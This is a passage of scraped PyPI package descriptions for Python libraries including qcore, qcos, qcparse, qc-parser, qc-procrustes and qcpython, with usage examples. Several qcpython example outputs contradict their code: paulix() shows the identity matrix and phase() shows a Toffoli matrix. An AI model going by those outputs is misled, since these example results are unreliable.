functions that can be called as a program executes in real time. See thecompute method docstringfor more details.See the/examplesdirectory for more examples.SupportIf you have any issues withqcopor would like to request a feature, please open anissue."} +{"package": "qcoptimizer", "pacakge-description": "QuantumCircuitOptimizerThis package takes any quantum circuit and selects the best Qiskit transpiler optimization level to maximize efficiency and accuracy.Github:https://github.com/TarenP/QuantumCircuitOptimizer"} +{"package": "qcore", "pacakge-description": "qcoreis a library of common utility functions used at Quora. It is used to\nabstract out common functionality for other Quora libraries likeasynq.Its component modules are discussed below. See the docstrings in the code\nitself for more detail.qcore.assertsWhen a normal Python assert fails, it only indicates that there was a failure,\nnot what the bad values were that caused the assert to fail. This module\nprovides rich assertion helpers that automatically produce better error\nmessages. 
For example:>>>fromqcore.assertsimportassert_eq>>>assert5==2*2Traceback(mostrecentcalllast):File\"\",line1,inAssertionError>>>assert_eq(5,2*2)Traceback(mostrecentcalllast):File\"\",line1,inFile\"qcore/asserts.py\",line82,inassert_eqassertexpected==actual,_assert_fail_message(message,expected,actual,'!=',extra)AssertionError:5!=4Similar methods are provided by the standard library\u2019sunittestpackage,\nbut those are tied to theTestCaseclass instead of being standalone\nfunctions.qcore.cachingThis provides helpers for caching data. Some examples include:fromqcore.cachingimportcached_per_instance,lazy_constant@lazy_constantdefsome_function():# this will only be executed the first time some_function() is called;# afterwards it will be cachedreturnexpensive_computation()classSomeClass:@cached_per_instance()defsome_method(self,a,b):# for any instance of SomeClass, this will only be executed oncereturnexpensive_computation(a,b)qcore.debugThis module provides some helpers useful for debugging Python. Among others, it\nincludes the@qcore.debug.trace()decorator, which can be used to trace\nevery time a function is called.qcore.decoratorsThis module provides an abstraction for class-based decorators that supports\ntransparently decorating functions, methods, classmethods, and staticmethods\nwhile also providing the option to add additional custom attributes. For\nexample, it could be used to provide a caching decorator that adds a.dirtyattribute to decorated functions to dirty their cache:fromqcore.decoratorsimportDecoratorBase,DecoratorBinder,decorateclassCacheDecoratorBinder(DecoratorBinder):defdirty(self,*args):ifself.instanceisNone:returnself.decorator.dirty(*args)else:returnself.decorator.dirty(self.instance,*args)classCacheDecorator(DecoratorBase):binder_cls=CacheDecoratorBinderdef__init__(self,*args):super().__init__(*args)self._cache={}defdirty(self,*args):try:delself._cache[args]exceptKeyError:passdef__call__(self,*args):try:returnself._cache[args]exceptKeyError:value=self.fn(*args)self._cache[args]=valuereturnvaluecached=decorate(CacheDecorator)qcore.enumThis module provides an abstraction for defining enums. You can define an enum\nas follows:fromqcore.enumimportEnumclassColor(Enum):red=1green=2blue=3qcore.errorsThis module provides some commonly useful exception classes and helpers for\nreraising exceptions from a different place.qcore.eventsThis provides an abstraction for registering events and running callbacks.\nExample usage:>>>fromqcore.eventsimportEventHook>>>event=EventHook()>>>defcallback():...print('callback called')...>>>event.subscribe(callback)>>>event.trigger()callbackcalledqcore.helpersThis provides a number of small helper functions.qcore.inspectable_classThis provides a base class that automatically provides hashing, equality\nchecks, and a readablerepr()result. Example usage:>>>fromqcore.inspectable_classimportInspectableClass>>>classPair(InspectableClass):...def__init__(self,a,b):...self.a=a...self.b=b...>>>Pair(1,2)Pair(a=1,b=2)>>>Pair(1,2)==Pair(1,2)Trueqcore.inspectionThis provides functionality similar to the standardinspectmodule. Among\nothers, it includes theget_original_fnfunction, which extracts the\nunderlying function from aqcore.decorators-decorated object.qcore.microtimeThis includes helpers for dealing with time, represented as an integer number\nof microseconds since the Unix epoch.qcore.testingThis provides helpers to use in unit tests. 
Among others, it provides anAnythingobject that compares equal to any other Python object."} +{"package": "qcore-nocython", "pacakge-description": "qcoreis a library of common utility functions used at Quora. It is used to\nabstract out common functionality for other Quora libraries likeasynq.Its component modules are discussed below. See the docstrings in the code\nitself for more detail.qcore.assertsWhen a normal Python assert fails, it only indicates that there was a failure,\nnot what the bad values were that caused the assert to fail. This module\nprovides rich assertion helpers that automatically produce better error\nmessages. For example:>>>fromqcore.assertsimportassert_eq>>>assert5==2*2Traceback(mostrecentcalllast):File\"\",line1,inAssertionError>>>assert_eq(5,2*2)Traceback(mostrecentcalllast):File\"\",line1,inFile\"qcore/asserts.py\",line82,inassert_eqassertexpected==actual,_assert_fail_message(message,expected,actual,'!=',extra)AssertionError:5!=4Similar methods are provided by the standard library\u2019sunittestpackage,\nbut those are tied to theTestCaseclass instead of being standalone\nfunctions.qcore.cachingThis provides helpers for caching data. Some examples include:fromqcore.cachingimportcached_per_instance,lazy_constant@lazy_constantdefsome_function():# this will only be executed the first time some_function() is called;# afterwards it will be cachedreturnexpensive_computation()classSomeClass(object):@cached_per_instance()defsome_method(self,a,b):# for any instance of SomeClass, this will only be executed oncereturnexpensive_computation(a,b)qcore.debugThis module provides some helpers useful for debugging Python. Among others, it\nincludes the@qcore.debug.trace()decorator, which can be used to trace\nevery time a function is called.qcore.decoratorsThis module provides an abstraction for class-based decorators that supports\ntransparently decorating functions, methods, classmethods, and staticmethods\nwhile also providing the option to add additional custom attributes. For\nexample, it could be used to provide a caching decorator that adds a.dirtyattribute to decorated functions to dirty their cache:fromqcore.decoratorsimportDecoratorBase,DecoratorBinder,decorateclassCacheDecoratorBinder(DecoratorBinder):defdirty(self,*args):ifself.instanceisNone:returnself.decorator.dirty(*args)else:returnself.decorator.dirty(self.instance,*args)classCacheDecorator(DecoratorBase):binder_cls=CacheDecoratorBinderdef__init__(self,*args):super(CacheDecorator,self).__init__(*args)self._cache={}defdirty(self,*args):try:delself._cache[args]exceptKeyError:passdef__call__(self,*args):try:returnself._cache[args]exceptKeyError:value=self.fn(*args)self._cache[args]=valuereturnvaluecached=decorate(CacheDecorator)qcore.enumThis module provides an abstraction for defining enums. You can define an enum\nas follows:fromqcore.enumimportEnumclassColor(Enum):red=1green=2blue=3qcore.errorsThis module provides some commonly useful exception classes and helpers for\nreraising exceptions from a different place.qcore.eventsThis provides an abstraction for registering events and running callbacks.\nExample usage:>>>fromqcore.eventsimportEventHook>>>event=EventHook()>>>defcallback():...print('callback called')...>>>event.subscribe(callback)>>>event.trigger()callbackcalledqcore.helpersThis provides a number of small helper functions.qcore.inspectable_classThis provides a base class that automatically provides hashing, equality\nchecks, and a readablerepr()result. 
Example usage:>>>fromqcore.inspectable_classimportInspectableClass>>>classPair(InspectableClass):...def__init__(self,a,b):...self.a=a...self.b=b...>>>Pair(1,2)Pair(a=1,b=2)>>>Pair(1,2)==Pair(1,2)Trueqcore.inspectionThis provides functionality similar to the standardinspectmodule. Among\nothers, it includes theget_original_fnfunction, which extracts the\nunderlying function from aqcore.decorators-decorated object.qcore.microtimeThis includes helpers for dealing with time, represented as an integer number\nof microseconds since the Unix epoch.qcore.testingThis provides helpers to use in unit tests. Among others, it provides anAnythingobject that compares equal to any other Python object."} +{"package": "qcos", "pacakge-description": "A Tencent Cloud object storage (COS) library with command-line support.InstallInstall via pip:pip install qcosConfigurationConfigure secret_id and secret_key using the official command-line tool CLI.Usage in codeRefer to the source code; it is fairly simple. Call it as follows:from qcos import Client\nclient = Client(secret_id, secret_key, region, bucket)\n# Upload from a local path\nclient.put_local('a.txt', local_path)\n# Upload content directly\nclient.put_object('a.txt', data='content')\n# Check whether a file exists\nclient.head_object('a.txt')Command-line format:qcos <local folder> region bucket <COS folder path>\nFor example:qcos ./build ap-beijing testbucket-10000 /"} +{"package": "qcos_cli", "pacakge-description": "No description available on PyPI."} +{"package": "qcp", "pacakge-description": "No description available on PyPI."} +{"package": "qcPALM", "pacakge-description": "No description available on PyPI."} +{"package": "qcparse", "pacakge-description": "qcparseA library for parsing Quantum Chemistry output files into structured data objects and converting structured input objects into program-native input files. Uses data structures fromqcio.qcparseworks in harmony with a suite of other quantum chemistry tools for fast, structured, and interoperable quantum chemistry.The QC Suite of Programsqcio- Beautiful and user friendly data structures for quantum chemistry.qcparse- A library for efficient parsing of quantum chemistry data into structuredqcioobjects and conversion ofqcioinput objects to program-native input files.qcop- A package for operating quantum chemistry programs usingqciostandardized data structures. Compatible withTeraChem,psi4,QChem,NWChem,ORCA,Molpro,geomeTRICand many more.BigChem- A distributed application for running quantum chemistry calculations at scale across clusters of computers or the cloud. Bring multi-node scaling to your favorite quantum chemistry program.ChemCloud- Aweb applicationand associatedPython clientfor exposing a BigChem cluster securely over the internet.✨ Basic UsageInstallation:python-mpipinstallqcparseParse a file into aSinglePointResultsobject with a single line of code.fromqcparseimportparse# May pass a path or the contents of a file as string/bytesresults=parse(\"terachem\",\"/path/to/stdout.log\")Theresultsobject will be aqcio.SinglePointResultsobject. Rundir(results)inside a Python interpreter to see the various values you can access. 
A few prominent values are shown here as an example:\nfrom qcparse import parse\nresults = parse(\"/path/to/tc.out\", \"terachem\")\nresults.energy\nresults.gradient  # If a gradient calc\nresults.hessian  # If a hessian calc\nresults.calcinfo_nmo  # Number of molecular orbitals\nParsed values can be written to disk like this:\nwith open(\"results.json\", \"w\") as f:\n    f.write(results.model_dumps_json())\nAnd read from disk like this:\nfrom qcio import SinglePointResults\nresults = SinglePointResults.open(\"results.json\")\nYou can also run qcparse from the command line like this:\nqcparse -h  # Get help message for cli\nqcparse terachem ./path/to/tc.out > results.json  # Parse TeraChem stdout to json\n\ud83d\udcbb Contributing: Please see the contributing guide for details on how to contribute new parsers to this project :) If there's data you'd like parsed from output files or want to support input files for a new program, please open an issue in this repo explaining the data items you'd like parsed and include an example output file containing the data, like this."} +{"package": "qc-parser", "pacakge-description": "QC parser for SMaHT. Parses outputs of different QC tools and unifies them for the SMaHT portal. Installation: simply run pip install qc-parser to install the package. You need at least Python 3.8. To develop this package, clone this repo, make sure poetry is installed on your system and run make install. Usage: after installation the following command can be run from the command line:\nparse-qc \\\n  -n 'BAM Quality Metrics' \\\n  --metrics samtools /PATH/samtools.stats.txt \\\n  --metrics picard_CollectInsertSizeMetrics /PATH/picard_cis_metrics.txt \\\n  --additional-files /PATH/additional_output_1.pdf \\\n  --additional-files /PATH/additional_output_2.tsv \\\n  --output-zip metrics.zip \\\n  --output-json qc_values.json\nIn this example, the tool will parse the Samtools output file /PATH/samtools.stats.txt and the Picard output file /PATH/picard_cis_metrics.txt. The values that are extracted from both files are specified in src/metrics_to_extract.py. All metrics are combined and stored in qc_values.json, which is compatible with Tibanna_ff's generic QC functionality. The metrics.zip will contain the following files:\nsamtools.stats.txt\npicard_cis_metrics.txt\nadditional_output_1.pdf\nadditional_output_2.tsv\nThe currently supported QC tools are: samtools_stats, picard_CollectAlignmentSummaryMetrics, picard_CollectInsertSizeMetrics, picard_CollectWgsMetrics, bamStats.py, fastqc, rnaseqqc (RNA-SeQC). Development: if you want to extract a new metric from an already supported QC tool, add the metric to src/metrics_to_extract.py in the appropriate section. If you want to add support for a new QC tool, you need to add a parser to src/MetricsParser.py and add the metrics you want to extract from the tool to src/metrics_to_extract.py. Tests: the command make test will run local tests."} +{"package": "qcportal", "pacakge-description": "No description available on PyPI."} +{"package": "qc-procrustes", "pacakge-description": "Procrustes: The Procrustes library provides a set of functions for transforming a matrix to make it as similar as possible to a target matrix. For more information, visit the Procrustes Documentation. Citation: Please use the following citation in any publication using the Procrustes library: \"Procrustes: A Python Library to Find Transformations that Maximize the Similarity Between Matrices.\", F. Meng, M. Richer, A. Tehrani, J. La, T. D. Kim, P. W. Ayers, F.
Heidar-Zadeh,JOURNAL XXX.DependenciesThe following dependencies are required to run Procrustes properly,Python >= 3.6:http://www.python.org/NumPy >= 1.18.5:http://www.numpy.org/SciPy >= 1.5.0:http://www.scipy.org/PyTest >= 5.3.4:https://docs.pytest.org/PyTest-Cov >= 2.8.0:https://pypi.org/project/pytest-cov/InstallationTo install Procrustes using the conda package management system, installminicondaoranacondafirst, and then:# Create and activate myenv conda environment (optional, but recommended)condacreate-nmyenvpython=3.6condaactivatemyenv# Install the stable release.condainstall-ctheochem/label/devqc-procrustesTo install Procrustes with pip, you may want to create avirtual environment, and then:# Install the stable release.pipinstallqc-procrustesSeehttps://procrustes.readthedocs.io/en/latest/usr_doc_installization.htmlfor full details."} +{"package": "qcpy", "pacakge-description": "qcPy is a Python framework for conveniently handling quantum-chemical calculations and the post-processing of the acquired data.For more general information on qcPy see itshomepage.InstallationInstall the package by running:pip install qcpyContributeSource Code:https://github.com/tillbiskup/qcpySupportIf you are having issues, please contact the package authors via GitHub and/or file a bug report there.LicenseThe project licensed under the BSD license."} +{"package": "qcpydev", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qcpython", "pacakge-description": "README.mdQCpy - A Quantum Computing Library for PythonQCpy is an open source python library and collaborative project for flexible simulations and visualizations of quantum circuits. Designed by college students with students in mind, this library contains a powerful set of tools to teach computer scientists about the emerging discipline of quantum computing.You can download the package using pip:pip install qcpythonQubitqcpy.qubit(initial_state=\u2019z\u2019)Object representation of a qubit.Parameters:initial_state (chr)default:z- Character input for starting direction in thex,y, orzaxis.Attributes:NoneExample:fromqcpyimportqubitqx=qubit(initial_state='x')qy=qubit(initial_state='y')qz=qubit(initial_state='z')print(\"qx:\\n\",qx)print(\"qy:\\n\",qy)print(\"qz:\\n\",qz)# qx:# [[0.70710677+0.j]# [0.70710677+0.j]]# qy:# [[0.70710677+0.j]# [0.+0.70710677j]]# qz:# [[1.+0.j]# [0.+0.j]]Quantum Gatesquantumgate.identity()Gate that does not modify the quantum state.Parameters:Noneidentity=[1+0j,0+0j],[0+0j,1+0j]Example:fromqcpyimportidentityprint(identity())# [[1.+0.j 0.+0.j]# [0.+0.j 1.+0.j]]quantumgate.paulix()Quantum equivalent of the NOT gate in classical computing with respect to the standard basis |0>, |1>.Parameters:NonePauliX=[0+0j,1+0j],[1+0j,0+0j]Example:fromqcpyimportpaulixprint(paulix())# [[1.+0.j 0.+0.j]# [0.+0.j 1.+0.j]]quantumgate.pauliy()Rotation around y-axis of the bloch sphere by \u03c0 radiains, mapping |0> to i|1> and |1> to -i|0>.Parameters:NonePauliY=[0+0j,0-1j],[0+1j,0+0j]Example:fromqcpyimportpauliyprint(pauliy())# [[0+0j, 0-1j]# [0+1j, 0+0j]]quantumgate.pauliz()Rotation around z-axis of the bloch sphere by \u03c0 radiains, mapping |1> to -|1>; known as the phase-flip.Parameters:NonePauliZ=[1+0j,0+0j],[0+0j,-1+0j]Example:fromqcpyimportpaulizprint(pauliz())# [[1+0j, 0+0j],# [0+0j, -1+0j]]quantumgate.hadamard()Maps the basis states |0> to |+> and |1> to |->, creating a superposition state if given a computation basis 
state.Parameters:NoneHadamard=[1,1][1,-1]*(1/sqrt(2))Example:fromqcpyimporthadamardprint(hadamard())# [[ 0.70710677+0.j 0.70710677+0.j]# [ 0.70710677+0.j -0.70710677+0.j]]quantumgate.cnot(little_endian=False)Controlled gate acts on two or more qubits, performing the NOT operation of the target qubit only if the control qubits are |1>, can act as a quantum regiester and is used to entangle and disentangle Bell states.Parameters:little_endian (bool)- if the gate is an inverse, with the target being above the control.# regularCNot=[1+0j,0+0j,0+0j,0+0j],[0+0j,1+0j,0+0j,0+0j],[0+0j,0+0j,0+0j,1+0j],[0+0j,0+0j,1+0j,0+0j]# little_endian = TrueCNot=[1+0j,0+0j,0+0j,0+0j],[0+0j,0+0j,0+0j,1+0j],[0+0j,0+0j,1+0j,0+0j],[0+0j,1+0j,0+0j,0+0j]Example:fromqcpyimportcnotprint(cnot())# [[1.+0.j 0.+0.j 0.+0.j 0.+0.j]# [0.+0.j 1.+0.j 0.+0.j 0.+0.j]# [0.+0.j 0.+0.j 0.+0.j 1.+0.j]# [0.+0.j 0.+0.j 1.+0.j 0.+0.j]]# [[1.+0.j 0.+0.j 0.+0.j 0.+0.j]# [0.+0.j 0.+0.j 0.+0.j 1.+0.j]# [0.+0.j 0.+0.j 1.+0.j 0.+0.j]# [0.+0.j 1.+0.j 0.+0.j 0.+0.j]]quantumgate.swap()Swaps two qubits, with respect to the basis |00>, |01>, |10>, and |11>.Parameters:NoneSwap=[1+0j,0+0j,0+0j,0+0j],[0+0j,0+0j,1+0j,0+0j],[0+0j,1+0j,0+0j,0+0j],[0+0j,0+0j,0+0j,1+0j]Example:fromqcpyimportswapprint(swap())# [1+0j, 0+0j, 0+0j, 0+0j],# [0+0j, 0+0j, 1+0j, 0+0j],# [0+0j, 1+0j, 0+0j, 0+0j],# [0+0j, 0+0j, 0+0j, 1+0j]quantumgate.toffoli()Universal reversible logic gate, known as the \u201ccontrolled-controlled-NOT\u201d gate; if the two control bits are set to 1, it will invert the target.Parameters:NoneToffoli=[1+0j,0+0j,0+0j,0+0j,0+0j,0+0j,0+0j,0+0j],[0+0j,1+0j,0+0j,0+0j,0+0j,0+0j,0+0j,0+0j],[0+0j,0+0j,1+0j,0+0j,0+0j,0+0j,0+0j,0+0j],[0+0j,0+0j,0+0j,1+0j,0+0j,0+0j,0+0j,0+0j],[0+0j,0+0j,0+0j,0+0j,1+0j,0+0j,0+0j,0+0j],[0+0j,0+0j,0+0j,0+0j,0+0j,1+0j,0+0j,0+0j],[0+0j,0+0j,0+0j,0+0j,0+0j,0+0j,0+0j,1+0j],[0+0j,0+0j,0+0j,0+0j,0+0j,0+0j,1+0j,0+0j]Example:fromqcpyimporttoffoliprint(toffoli())# [1+0j, 0+0j, 0+0j, 0+0j, 0+0j, 0+0j, 0+0j, 0+0j],# [0+0j, 1+0j, 0+0j, 0+0j, 0+0j, 0+0j, 0+0j, 0+0j],# [0+0j, 0+0j, 1+0j, 0+0j, 0+0j, 0+0j, 0+0j, 0+0j],# [0+0j, 0+0j, 0+0j, 1+0j, 0+0j, 0+0j, 0+0j, 0+0j],# [0+0j, 0+0j, 0+0j, 0+0j, 1+0j, 0+0j, 0+0j, 0+0j],# [0+0j, 0+0j, 0+0j, 0+0j, 0+0j, 1+0j, 0+0j, 0+0j],# [0+0j, 0+0j, 0+0j, 0+0j, 0+0j, 0+0j, 0+0j, 1+0j],# [0+0j, 0+0j, 0+0j, 0+0j, 0+0j, 0+0j, 1+0j, 0+0j]quantumgate.phase(theta=numpy.pi/2)Applies a rotation of theta around the z-axis.Parameters:theta (float)default:numpy.pi/2- angle of rotation around z-axis.Phase=[1+0j,0+0j],[0+0j,numpy.exp(0+1j*theta)]Example:fromqcpyimportphaseprint(phase())# [1+0j, 0+0j, 0+0j, 0+0j, 0+0j, 0+0j, 0+0j, 0+0j],# [0+0j, 1+0j, 0+0j, 0+0j, 0+0j, 0+0j, 0+0j, 0+0j],# [0+0j, 0+0j, 1+0j, 0+0j, 0+0j, 0+0j, 0+0j, 0+0j],# [0+0j, 0+0j, 0+0j, 1+0j, 0+0j, 0+0j, 0+0j, 0+0j],# [0+0j, 0+0j, 0+0j, 0+0j, 1+0j, 0+0j, 0+0j, 0+0j],# [0+0j, 0+0j, 0+0j, 0+0j, 0+0j, 1+0j, 0+0j, 0+0j],# [0+0j, 0+0j, 0+0j, 0+0j, 0+0j, 0+0j, 0+0j, 1+0j],# [0+0j, 0+0j, 0+0j, 0+0j, 0+0j, 0+0j, 1+0j, 0+0j]quantumgate.s()Equivalent to a pi/2 rotation around the z-axis.Parameters:NoneS.matrix=[1+0j,0+0j],[0+0j,0+1j]Example:fromqcpyimportsprint(s())# [1+0j, 0+0j],# [0+0j, 0+1j]quantumgate.sdg()Inverse of S gate; a -pi/2 rotation around the z-axis.Parameters:NoneSdg.matrix=[1+0j,0+0j],[0+0j,0-1j]Example:fromqcpyimportsdgprint(sdg())# [1+0j, 0+0j],# [0+0j, 0-1j]quantumgate.t()Square of S gate; where T = S^2.Parameters:NoneT.matrix=[1+0j,0+0j],[0+0j,numpy.exp((0+1j*numpy.pi)/4)]Example:fromqcpyimporttprint(t())# [[1.+0.j 0.+0.j]# [0.+0.j 
0.70710677+0.70710677j]]quantumgate.tdg()Inverse of T gate.Parameters:NoneTdg=[1+0j,0+0j],[0+0j,numpy.exp((0-1j*numpy.pi)/4)]Example:fromqcpyimporttdgprint(tdg())# [[1.+0.j 0.+0.j]# [0.+0.j 0.70710677-0.70710677j]]quantumgate.rz(theta=numpy.pi/2)Rotation of qubit around the z-axis.Parameters:theta (float)default:numpy.pi/2- angle of rotation around z-axis.Rz=[numpy.exp((0-1j*(theta/2))),0+0j],[0+0j,numpy.exp(0+1j*(theta/2))]quantumgate.rx(theta=numpy.pi/2)Rotation of qubit around the x-axis.Parameters:theta (float)default:numpy.pi/2- angle of rotation around x-axis.Rx=[numpy.cos(theta/2),0-1j*numpy.sin(theta/2)],[0-1j*numpy.sin(theta/2),numpy.cos(theta/2)]Example:fromqcpyimportrxprint(rx())# [[0.70710677+0.j 0.-0.70710677j]# [0.-0.70710677j 0.70710677+0.j]]quantumgate.ry(theta=numpy.pi/2)Rotation of qubit around the y-axis.Parameters:theta (float)default:numpy.pi/2- angle of rotation around y-axis.Ry=[numpy.cos(theta/2),-1*numpy.sin(theta/2)],[numpy.sin(theta/2),numpy.cos(theta/2)]Example:fromqcpyimportryprint(ry())# [[ 0.70710677+0.j -0.70710677+0.j]# [ 0.70710677+0.j 0.70710677+0.j]]quantumgate.sx()Rotation around the x-axis by 90 degrees in the counter-clockwise direction. Also known as the \u201csquare-root X gate\u201d due to the fact that applying the SX gate twice results in an X gate.Parameters:NoneSx=[1+1j,1-1j],[1-1j,1+1j]*(1/2)Example:fromqcpyimportsxprint(sx())# [[0.5+0.5j 0.5-0.5j]# [0.5-0.5j 0.5+0.5j]]quantumgate.sxdg()Inverse of the Sx gate.Parameters:NoneSxdg=[1-1j,1+1j],[1+1j,1-1j]*(1/2)Example:fromqcpyimportsxdgprint(sxdg())# [[0.5-0.5j 0.5+0.5j]# [0.5+0.5j 0.5-0.5j]]quantumgate.u(theta=numpy.pi/2, phi=numpy.pi/2, lmbda=numpy.pi/2)Rotation of qubit with respect to theta, phi, and lambda, in Euler angles.Parameters:theta (float)default:numpy.pi/2- angle of rotation around Euler angle theta.phi (float)default:numpy.pi/2- angle of rotation around Euler angle phi.lmbda (float)default:numpy.pi/2- angle of rotation around Eulear angle lambda.U.matrix=[numpy.cos(theta/2),-1*numpy.exp(0+1j*lmbda)*numpy.sin(theta/2)],[numpy.exp(0+1j*phi)*numpy.sin(theta/2),numpy.exp(0+1j*(lmbda+phi))*numpy.cos(theta/2)]]Example:fromqcpyimportuprint(u())# [[0.7071+0.j -0.-0.7071j]# [0.+0.7071j -0.7071+0.j]]quantumgate.rxx(theta=numpy.pi/2)Rotation about XX, maximally entangling at theta = pi/2.Parameters:theta (float)default:numpy.pi/2- angle of rotation around XX.Rxx.matrix=[numpy.cos(theta/2),0+0j,0+0j,0-1j*numpy.sin(theta/2)],[0+0j,numpy.cos(theta/2),0-1j*numpy.sin(theta/2),0+0j],[0+0j,0-1j*numpy.sin(theta/2),numpy.cos(theta/2),0+0j],[0-1j*numpy.sin(theta/2),0+0j,0+0j,numpy.cos(theta/2)]Example:fromqcpyimportrxxprint(rxx())# [[0.70710677+0.j 0+0.j 0+0.j 0-0.70710677j]# [0+0.j 0.70710677+0.j 0-0.70710677j 0+0.j]# [0+0.j 0-0.70710677j 0.70710677+0.j 0+0.j]# [0-0.70710677j 0+0.j 0.+0.j 0.70710677+0.j]]quantumgate.rzz(theta=numpy.pi/2)Rotation about ZZ, maximally entangling at theta = pi/2.Parameters:theta (float)default:numpy.pi/2- angle of rotation around ZZ.Rzz.matrix=[numpy.exp(0-1j*(theta/2)),0+0j,0+0j,0+0j],[0+0j,numpy.exp(0+1j*(theta/2)),0+0j,0+0j],[0+0j,0+0j,numpy.exp(0+1j*(theta/2)),0+0j],[0+0j,0+0j,0+0j,numpy.exp(0-1j*(theta/2))]Example:fromqcpyimportrzzprint(rzz())# [[0.70710677-0.70710677j 0+0.j 0+0.jn 0+0.j]# [0+0.j 0.70710677+0.70710677j 0+0.j 0+0.j]# [0+0.j 0+0.j 0.70710677+0.70710677j 0+0.j]# [0+0.j 0+0.j 0+0.j 0.70710677-0.70710677j]]quantumgate.cr(theta=numpy.pi/2)Controlled phase shift rotation in theta radians; generalization of Cz gate.Parameters:theta (float)default:numpy.pi/2- 
angle of rotation in theta radians.Cr=[1+0j,0+0j,0+0j,0+0j],[0+0j,1+0j,0+0j,0+0j],[0+0j,0+0j,1+0j,0+0j],[0+0j,0+0j,0+0j,exp(theta*0+1j)]Example:fromqcpyimportcrprint(cr())# [[1+0.j 0+0.j 0+0.j 0+0.j]# [0+0.j 1+0.j 0+0.j 0+0.j]# [0+0.j 0+0.j 1+0.j 0+0.j]# [0+0.j 0+0.j 0+0.j 0.5403023+0.84147096j]]quantumgate.cz(theta=numpy.pi/2)Controlled phase shift rotation in theta radians.Parameters:theta (float)default:numpy.pi/2- angle of rotation in theta radians.Cz=[1+0j,0+0j,0+0j,0+0j],[0+0j,1+0j,0+0j,0+0j],[0+0j,0+0j,1+0j,0+0j],[0+0j,0+0j,0+0j,-1+0j]Example:fromqcpyimportczprint(cz())# [[ 1.+0.j 0.+0.j 0.+0.j 0.+0.j]# [ 0.+0.j 1.+0.j 0.+0.j 0.+0.j]# [ 0.+0.j 0.+0.j 1.+0.j 0.+0.j]# [ 0.+0.j 0.+0.j 0.+0.j -1.+0.j]]Quantum Circuitclassqcpy.quantumcircuit(qubits: int,little_endian: bool=False,prep: char='z')Quantum circuit that represents the state of a quantum system and performs operations on select qubits.Parameters:qubits (int)- number of qubits in the circuit.little_endian (bool)default:False- order of qubits and tensor products.prep (char)options: [z,y,x] - initial direction of the qubits' phase angle.Attributes:state (numpy.ndarray)- current state of quantum circuit in matrix representation.quantumcircuit.amplitude(round: int=3)Returns vector of all possible amplitudes for the quantum circuitParameters:round (int)- rounding the amplitude to the nearestroundReturns:amplitude (numpy.ndarray[float16])- amplitude of the quantum circuit.Example:fromqcpyimportquantumcircuitqc=quantumcircuit(2)qc.h(0)qc.cnot(0,1)qc.h(0)print(qc.amplitude())# [[0.5]# [0.5]# [0.5]# [0.5]]quantumcircuit.phaseangle(round: int=2,radian: bool=True)Calculates possible phase angles for the quantum circuitParameters:round (int)- round phase angle for readability.radian (bool)- whether or not the values are in radians or degrees.Returns:phase_angle (numpy.ndarray)- array of qubit's phase angle.Example:fromqcpyimportquantumcircuitqc=quantumcircuit(2)qc.h(0)qc.cnot(0,1)qc.h(0)print(qc.phaseangle())# [[0. ]# [0. ]# [0. ]# [3.14159265]]quantumcircuit.stateReturns state of the quantum circuit.Parameters:NoneReturns:state (numpy.ndarray)- array of quantum circuit's state.Example:fromqcpyimportquantumcircuitqc=quantumcircuit(2)qc.h(0)qc.cnot(0,1)print(qc.state)# [[0.707+0.j]# [0. +0.j]# [0. +0.j]# [0.707+0.j]]quantumcircuit.flatten(round: int=3)Returns state of the quantum circuit in a 1D array.Parameters:round (int)- round state for readability.Returns:state (numpy.ndarray)- array of quantum circuit's state.Example:fromqcpyimportquantumcircuitqc=quantumcircuit(2)qc.h(0)qc.cnot(0,1)print(qc.flatten())# [0.707+0.j 0. +0.j 0. 
+0.j 0.707+0.j]quantumcircuit.circuitqueue()Returns queue of gates on quantum circuit.Parameters:NoneReturns:queue (list)- list of gates queued on quantum circuit.Example:fromqcpyimportquantumcircuitqc=QuantumCircuit(4)qc.x(0)qc.x(1)qc.x(2)qc.rc3x(0,1,2,3)print(qc.circuitqueue())# [('X', 0), ('X', 1), ('X', 2), ('U', 3), ('U', 3), ('cnot', 2, # 3), ('U', 3), ('U', 3), ('swap', 2, 3), ('swap', 1, 2),# ('swap', 1, 2), ('swap', 2, 3), ('cnot', 0, 3), ('U', 3),# ('swap', 2, 3), ('swap', 2, 3), ('cnot', 1, 3), ('U', 3),# ('swap', 2, 3), ('swap', 1, 2), ('swap', 1, 2), ('swap', 2,# 3), ('cnot', 0, 3), ('U', 3), ('swap', 2, 3), ('swap', 2, 3),# ('cnot', 1, 3), ('U', 3), ('U', 3), ('U', 3), ('cnot', 2, 3),# ('U', 3), ('U', 3), ('rc3x', 0, 1, 2, 3)]quantumcircuit.probabilities(show_percent: bool=False,show_bit=-1,round: int=3)Returns probabilitiy of the qubits within the quantum circuit.Parameters:show_percent (bool)- convert probability to be shown in percentage.show_bit (int or str)- get the probability of a single bit with a given string of binary or a integer.round (int)- rounding the probabilities to the nearestround.Returns:prob_matrix (numpy.ndarray)- array of quantum circuit's probabilities.Example:fromqcpyimportquantumcircuitqc=quantumcircuit(2)qc.h(0)qc.cnot(0,1)print(qc.probabilities())# [0.5 0. 0. 0.5]quantumcircuit.measure()Collapses the state based on the quantum circuit's probabilities.Parameters:NoneReturns:final_state (numpy.ndarray)- array of quantum circuit's measurement.Example:fromqcpyimportquantumcircuitqc=quantumcircuit(2)qc.h(0)qc.cnot(0,1)print(qc.measure())# 00quantumcircuit.reverse()Reverses the quantum circuit's values.Parameters:NoneReturns:NoneExample:fromqcpyimportquantumcircuitqc=quantumcircuit(2)qc.h(0)print(qc.state)qc.reverse()print(qc.state)# [[0.707+0.j]# [0. +0.j]# [0.707+0.j]# [0. +0.j]]# [[0. +0.j]# [0.707+0.j]# [0. +0.j]# [0.707+0.j]]quantumcircuit.toffoli(control_1: int,control_2: int,target: int)A 3-qubit quantum gate that takes in two control qubits and one target qubit.Parameters:control_1 (int)- first control qubit.control_2 (int)- second control qubit.target (int)- target qubit.Returns:NoneExample:fromqcpyimportquantumcircuitqc=quantumcircuit(3)qc.h(0)qc.h(1)qc.toffoli(0,1,2)print(qc.state)# [[0.5+0.j]# [0. +0.j]# [0.5+0.j]# [0. +0.j]# [0.5+0.j]# [0. +0.j]# [0. +0.j]# [0.5+0.j]]quantumcircuit.rccx(control_1,control_2,target)A 3-qubit quantum gate that takes in two control qubits and one target qubit.Parameters:control_1 (int)- first control qubit.control_2 (int)- second control qubit.target (int)- target qubit.Returns:NoneExample:fromqcpyimportquantumcircuitqc=quantumcircuit(3)qc.h(0)qc.h(1)qc.rccx(0,1,2)print(qc.state)# [[ 0.5-0.j ]# [ 0. +0.j 